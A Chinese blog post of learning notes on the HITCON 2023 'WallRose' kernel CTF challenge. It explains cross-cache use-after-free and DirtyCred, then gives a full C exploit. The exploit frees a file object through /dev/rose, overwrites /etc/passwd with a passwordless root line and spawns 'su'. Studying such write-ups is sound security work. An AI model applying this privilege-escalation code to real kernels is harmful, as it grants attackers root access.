Hitcon2023 WallRose学习记录 CrossCache UAF + DirtyCred

0x400大小对象的UAF, 没开memcg, 开了FG-KASLR.

主要是学习手法, 下次遇到了再写exp……

CrossCache UAF

https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel
https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/

如何构造CrossCache UAF.

内存分配释放相关过程

如何分配一个新的页面?

如何释放页面?
下图中有一个地方不准确, 在unfreeze_partials中, 是否discard_slab还有一个kmem_cache_node->nr_partial >= kmem_cache->min_partial的要求, 这也是在kmem_cache_node的partial链表中能看到完全空闲的slab的原因.

从左向右, 首先释放目标slab上的所有对象, 使得其进入partial_list.
之后释放每个slab中的1个对象, 使得partial_list逐渐填满, 触发unfreeze_partials.
在unfreeze_partials中, 由于目标slab完全空闲(所有对象已释放), 则目标slab会被释放回到Buddy_system.

如何填满一个slab? : /sys/kernel/slab/XXX/objs_per_slab 此例中为25
partial_list允许的最大slab数量? : /sys/kernel/slab/XXX/cpu_partial 此例中为13

CorssCache UAF构造

1. Reserving slabs to overflow the partial list

为了填充partial_list直至溢出, 我们需要先持有一些页面.
方法为分配 (objs_per_slab * (cpu_partial+1) ) 个对象.

图中演示了此时active_slab的两种情况, 取决于分配前第一个slab是否是完全空闲的, 明显后者概率更大,于是假设现在处于后一种情况.

2. Setting the target slab as the active slab

第二步是准备目标slab.
分配 (objs_per_slab-1) 个对象, 使得slab 16成为新的active_slab, 其中有( (objs_per_slab-1) - (objs_per_slab) - n) = n-1 个对象, n为步骤一后slab15中的对象个数.

3.Triggering the Use-After-Free

第三步, 在目标板中分配vulnerable对象.

4.Setting a new active slab

分配 (objs_per_slab+1) 个对象,并使一个新的slab成为active_slab, 而target_slab不再active, 为释放进partial_list做准备.

5.Emptying the target slab

释放目标板中的所有对象, 触发put_cpu_partial,使得目标板进入partial_list且处于完全空闲状态.

6.Overflowing the partial list to free the target slab

释放第一步中准备的每个slab中的一个对象, 使得其进入partial_list且避免呗销毁, 直到填满触发unfreeze_partials, 然后进入到对应的kmem_cache_node, 而target_slab则被discard, 回到buddy_system

DirtyCred

后面的DirtyCred 用的是更简单的mmap 而不是write时的竞争.
出自 flip UAF: https://gist.github.com/d4em0n/470bd48ab6c084be0239f29759cd8747

exp来源: https://chovid99.github.io/posts/hitcon-ctf-2023/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
//gcc -pthread -no-pie -static ../../exploit.c  -o exp 
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <errno.h>
#include <inttypes.h>
#include <limits.h>
#include <pthread.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <poll.h>
#include <stdnoreturn.h>
#include <string.h>
#include <unistd.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <linux/capability.h>
#include <sys/xattr.h>
#include <linux/io_uring.h>
#include <linux/membarrier.h>
#include <linux/io_uring.h>
#include <linux/membarrier.h>

#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)

#define CC_OVERFLOW_FACTOR 5 // Used to handle fragmentation
#define OBJS_PER_SLAB 8 // Fetch this from /sys/kernel/slab/kmalloc-1k/objs_per_slab
#define CPU_PARTIAL 24 // Fetch this from /sys/kernel/slab/kmalloc-1k/cpu_partial
#define MSG_SIZE 0x400-48 // kmalloc-1k (because CONFIG_MEMCG_KMEM is disabled, we can use msg_msg)

static noreturn void fatal(const char *msg)
{
perror(msg);
exit(EXIT_FAILURE);
}

/*
Cross-cache abstraction taken from https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel
Notes that here is minor adjustments that we made to the abstraction
*/
enum {
CC_RESERVE_PARTIAL_LIST = 0,
CC_ALLOC_VICTIM_PAGE,
CC_FILL_VICTIM_PAGE,
CC_EMPTY_VICTIM_PAGE,
CC_OVERFLOW_PARTIAL_LIST
};

struct cross_cache
{
uint32_t objs_per_slab;
uint32_t cpu_partial;
struct
{
int64_t *overflow_objs;
int64_t *pre_victim_objs;
int64_t *post_victim_objs;
};
uint8_t phase;
int (*allocate)(int64_t);
int (*free)(int64_t);
};

static struct cross_cache *kmalloc1k_cc;
static inline int64_t cc_allocate(struct cross_cache *cc,
int64_t *repo,
uint32_t to_alloc)
{
for (uint32_t i = 0; i < to_alloc; i++)
{
int64_t ref = cc->allocate(i);
if (ref == -1)
return -1;
repo[i] = ref;
}
return 0;
}


static inline int64_t cc_free(struct cross_cache *cc,
int64_t *repo,
uint32_t to_free,
bool per_slab)
{
for (uint32_t i = 0; i < to_free; i++)
{
// if per_slab is true, The target is to free one object per slab.
if (per_slab && (i % (cc->objs_per_slab - 1)))
continue;
if (repo[i] == -1)
continue;
cc->free(repo[i]);
repo[i] = -1;
}
return 0;
}

static inline int64_t reserve_partial_list_amount(struct cross_cache *cc)
{
uint32_t to_alloc = cc->objs_per_slab * (cc->cpu_partial + 1) * CC_OVERFLOW_FACTOR;
cc_allocate(cc, cc->overflow_objs, to_alloc);
return 0;
}

static inline int64_t allocate_victim_page(struct cross_cache *cc)
{
uint32_t to_alloc = cc->objs_per_slab - 1;
cc_allocate(cc, cc->pre_victim_objs, to_alloc);
return 0;
}

static inline int64_t fill_victim_page(struct cross_cache *cc)
{
uint32_t to_alloc = cc->objs_per_slab + 1;
cc_allocate(cc, cc->post_victim_objs, to_alloc);
return 0;
}

static inline int64_t empty_victim_page(struct cross_cache *cc)
{
uint32_t to_free = cc->objs_per_slab - 1;
cc_free(cc, cc->pre_victim_objs, to_free, false);
to_free = cc->objs_per_slab + 1;
cc_free(cc, cc->post_victim_objs, to_free, false);
return 0;
}

static inline int64_t overflow_partial_list(struct cross_cache *cc)
{
uint32_t to_free = cc->objs_per_slab * (cc->cpu_partial + 1) * CC_OVERFLOW_FACTOR;
cc_free(cc, cc->overflow_objs, to_free, true);
return 0;
}

static inline int64_t free_all(struct cross_cache *cc)
{
uint32_t to_free = cc->objs_per_slab * (cc->cpu_partial + 1)* CC_OVERFLOW_FACTOR;
cc_free(cc, cc->overflow_objs, to_free, false);
empty_victim_page(cc);

return 0;
}

int64_t cc_next(struct cross_cache *cc)
{
switch (cc->phase++)
{
case CC_RESERVE_PARTIAL_LIST:
return reserve_partial_list_amount(cc);
case CC_ALLOC_VICTIM_PAGE:
return allocate_victim_page(cc);
case CC_FILL_VICTIM_PAGE:
return fill_victim_page(cc);
case CC_EMPTY_VICTIM_PAGE:
return empty_victim_page(cc);
case CC_OVERFLOW_PARTIAL_LIST:
return overflow_partial_list(cc);
default:
return 0;
}
}

void cc_deinit(struct cross_cache *cc)
{
free_all(cc);
free(cc->overflow_objs);
free(cc->pre_victim_objs);
free(cc->post_victim_objs);
free(cc);
}

void init_msq(int64_t *repo, uint32_t to_alloc ) {
for (int i = 0; i < to_alloc ; i++) {
repo[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (repo[i] < 0) {
logd("[-] msgget() fail\n");
exit(-1);
}
}
}

struct cross_cache *cc_init(uint32_t objs_per_slab,
uint32_t cpu_partial,
void *allocate_fptr,
void *free_fptr)
{
struct cross_cache *cc = malloc(sizeof(struct cross_cache));
if (!cc)
{
perror("init_cross_cache:malloc\n");
return NULL;
}
cc->objs_per_slab = objs_per_slab;
cc->cpu_partial = cpu_partial;
cc->free = free_fptr;
cc->allocate = allocate_fptr;
cc->phase = CC_RESERVE_PARTIAL_LIST;

uint32_t n_overflow = objs_per_slab * (cpu_partial + 1) * CC_OVERFLOW_FACTOR;
uint32_t n_previctim = objs_per_slab - 1;
uint32_t n_postvictim = objs_per_slab + 1;

cc->overflow_objs = malloc(sizeof(int64_t) * n_overflow);
cc->pre_victim_objs = malloc(sizeof(int64_t) * n_previctim);
cc->post_victim_objs = malloc(sizeof(int64_t) * n_postvictim);

init_msq(cc->overflow_objs, n_overflow);
init_msq(cc->pre_victim_objs, n_previctim);
init_msq(cc->post_victim_objs, n_postvictim);
return cc;
}

static int rlimit_increase(int rlimit)
{
struct rlimit r;
if (getrlimit(rlimit, &r))
fatal("rlimit_increase:getrlimit");

if (r.rlim_max <= r.rlim_cur)
{
printf("[+] rlimit %d remains at %.lld", rlimit, r.rlim_cur);
return 0;
}
r.rlim_cur = r.rlim_max;
int res;
if (res = setrlimit(rlimit, &r))
fatal("rlimit_increase:setrlimit");
else
printf("[+] rlimit %d increased to %lld\n", rlimit, r.rlim_max);
return res;
}

static int64_t cc_alloc_kmalloc1k_msg(int64_t msqid)
{
struct {
long mtype;
char mtext[MSG_SIZE];
} msg;
msg.mtype = 1;
memset(msg.mtext, 0x41, MSG_SIZE - 1);
msg.mtext[MSG_SIZE-1] = 0;
msgsnd(msqid, &msg, sizeof(msg.mtext), 0);
return msqid;
}

static void cc_free_kmalloc1k_msg(int64_t msqid)
{
struct {
long mtype;
char mtext[MSG_SIZE];
} msg;
msg.mtype = 0;
msgrcv(msqid, &msg, sizeof(msg.mtext), 0, IPC_NOWAIT | MSG_NOERROR);
}

int open_rose() {
return open("/dev/rose", O_RDWR);
}

int rose_fds[2];
int freed_fd = -1;
#define NUM_SPRAY_FDS 0x300
int main(void)
{
puts("=======================");
puts("[+] Initial setup");
system("echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' > /tmp/a");
rlimit_increase(RLIMIT_NOFILE);

// Alloc the first rose
// This will be used later to trigger double free
rose_fds[0] = open_rose();

puts("=======================");
puts("[+] Try to free the page"); // Based on https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
kmalloc1k_cc = cc_init(OBJS_PER_SLAB, CPU_PARTIAL, cc_alloc_kmalloc1k_msg, cc_free_kmalloc1k_msg);

// Step 1
puts("[+] Step 1: Allocate a lot of slabs (To be put in the partial list later)");
cc_next(kmalloc1k_cc);

// Step 2
puts("[+] Step 2: Allocate target slab that we want to discard");
cc_next(kmalloc1k_cc);

// Step 3
puts("[+] Step 3: Put rose in the target slab");
rose_fds[1] = open_rose();

// Step 4
puts("[+] Step 4: Fulfill the target slab until we have a new active slab");
cc_next(kmalloc1k_cc);

// Step 5
puts("[+] Step 5: Try to free rose & other objects with hope that the target slab will be empty + be put in the partial list");
// Free rose, but rose_fds[0] also pointing to the same chunk,
// and we can use rose_fds[0] later to free other chunk that resides in here
close(rose_fds[1]);
cc_next(kmalloc1k_cc);

// Step 6
puts("[+] Step 6: Fulfill the partial list and discard the target slab (because it's empty) to per_cpu_pages");
cc_next(kmalloc1k_cc);
// The page (order 1) will be discarded, and it goes to per_cpu_pages (__free_pages -> free_the_page -> free_unref_page -> free_unref_page_commit)
// We need to make it goes to the free area instead of per_cpu_pages

// Step 7
puts("[+] Step 7: Make PCP freelist full, so that page goes to free area in buddy");
cc_deinit(kmalloc1k_cc);
// We try to make the page stored in pcp goes to free area by making
// the pcp freelist full.
// Free all allocation that we've made before to trigger it, and after that
// We can start our cross-cach exploitation.

puts("=======================");
puts("[+] Start the main exploit");

// Trigger cross-cache, file will use the freed page
puts("[+] Spray FDs");
int spray_fds[NUM_SPRAY_FDS];
for(int i =0;i<NUM_SPRAY_FDS;i++){
spray_fds[i] = open("/tmp/a", O_RDWR); // /tmp/a is a writable file
if (spray_fds[i] == -1)
fatal("Failed to open FDs");
}

// Before: 2 fd 1 refcount (rose_fds[1] & spray_fds[i])
puts("[+] Free one of the FDs via rose");
close(rose_fds[0]);
// After: 1 fd but pointed chunk is free

// Spray to replace the previously freed chunk
// Set the lseek to 0x8, so that we can find easily the fd
puts("[+] Find the freed FD using lseek");
int spray_fds_2[NUM_SPRAY_FDS];
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
spray_fds_2[i] = open("/tmp/a", O_RDWR);
lseek(spray_fds_2[i], 0x8, SEEK_SET);
}
// After: 2 fd 1 refcount (Because new file)

// The freed fd will have lseek value set to 0x8. Try to find it.
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
if (lseek(spray_fds[i], 0 ,SEEK_CUR) == 0x8) {
freed_fd = spray_fds[i];
lseek(freed_fd, 0x0, SEEK_SET);
printf("[+] Found freed fd: %d\n", freed_fd);
break;
}
}
if (freed_fd == -1)
fatal("Failed to find FD");

// mmap trick instead of race with write
puts("[+] DirtyCred via mmap");
char *file_mmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, freed_fd, 0);
// After: 3 fd 2 refcount (Because new file)

close(freed_fd);
// After: 2 fd 1 refcount (Because new file)

for (int i = 0; i < NUM_SPRAY_FDS; i++) {
close(spray_fds_2[i]);
}
// After: 1 fd 0 refcount (Because new file)
// Effect: FD in mmap (which is writeable) can be replaced with RDONLY file

for (int i = 0; i < NUM_SPRAY_FDS; i++) {
spray_fds[i] = open("/etc/passwd", O_RDONLY);
}
// After: 2 fd 1 refcount (but writeable due to mmap)

strcpy(file_mmap, "root::0:0:root:/root:/bin/sh\n");
puts("[+] Finished! Open root shell...");
puts("=======================");
system("su");
return 0;
}

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信